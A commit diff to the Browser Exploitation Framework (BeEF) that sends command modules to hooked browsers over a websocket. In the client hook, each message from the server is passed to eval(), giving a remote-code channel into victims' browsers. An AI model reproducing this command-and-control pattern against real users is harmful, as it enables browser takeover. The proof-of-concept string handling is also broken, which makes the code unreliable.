Commands are now sent through websocket

Trouble with eval function in websocket.js

config.yaml

@@ -38,7 +38,7 @@ beef:
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
         websocket:
-          enable: false
+          enable: true
           secure: false # use WebSocketSecure
           port: 11989
 

core/main/client/updater.js

@@ -23,7 +23,7 @@ beef.updater = {
 	// Low timeouts combined with the way the framework sends commamd modules result 
 	// in instructions being sent repeatedly or complex code. 
 	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 1000,
+	timeout: 5000,
 	
 	// A lock.
 	lock: false,

core/main/client/websocket.js

@@ -47,9 +47,11 @@ beef.websocket = {
         }
         this.socket.onmessage = function (message){
            //@todo append the command to head in <script> </script>
-            console.log("We recive a message "+message.data);
+            console.log("We recive a message ' "+message.data+"'");
+            eval("'"+message.data +"'");
 
-        }
+             /*END POC*/
+           }
 
     },
 

core/main/handlers/modules/command.rb

@@ -50,11 +50,31 @@ module BeEF
             build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
             let= BeEF::Core::Websocket::Websocket.instance
             #@todo radoen debug this one
-            exist=  let.getsocket(hooked_browser.session)
-            if  exist != nil
 
-              let.sent(command_module.output, hooked_browser.session)
+            if  let.getsocket(hooked_browser.session)
+
+              funtosend=command_module.output.gsub("beef.execute(function()","")
+              funtosend=funtosend.gsub("});", "")
+              funtosend=funtosend.gsub("{", "")
+              funtosend=funtosend.gsub('//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//',"")
+              let.sent(funtosend, hooked_browser.session)
+              print_info("We are sending #{funtosend}")
             else
+              print_info("not in else")
               @body << command_module.output + "\n\n"
 
             end

core/main/network_stack/websocket/websocket.rb

@@ -27,7 +27,6 @@ module BeEF
 
 
         def initialize
-          print_info("/n In activesocket we have #{@@activeSocket}")
           config = BeEF::Core::Configuration.instance
           port = config.get("beef.http.websocket.port")
           secure = config.get("beef.http.websocket.secure")
@@ -50,7 +49,7 @@ module BeEF
                   if(/BEEFHOOK=/.match(message))
                     print_info("Browser #{ws.origin} says helo! ws is running")
                     #insert new connection in activesocket
-                    @@activeSocket["#{message.split(/BEEFHOOK=/)}"] = ws
+                    @@activeSocket["#{message.split(/BEEFHOOK=/)[1]}"] = ws
                     print_debug("In activesocket we have #{@@activeSocket}")
                   end
                 end
@@ -60,7 +59,11 @@ module BeEF
         end
         #@note used in command.rd return nill if browser is not in list else giveback websocket
         def getsocket (browser_id)
-          @@activeSocket[browser_id]
+          if ( @@activeSocket[browser_id] != nil)
+              true
+          else
+              false
+          end
         end
         #@note send a function to hooked and ws browser
         def sent (fn ,browser_id )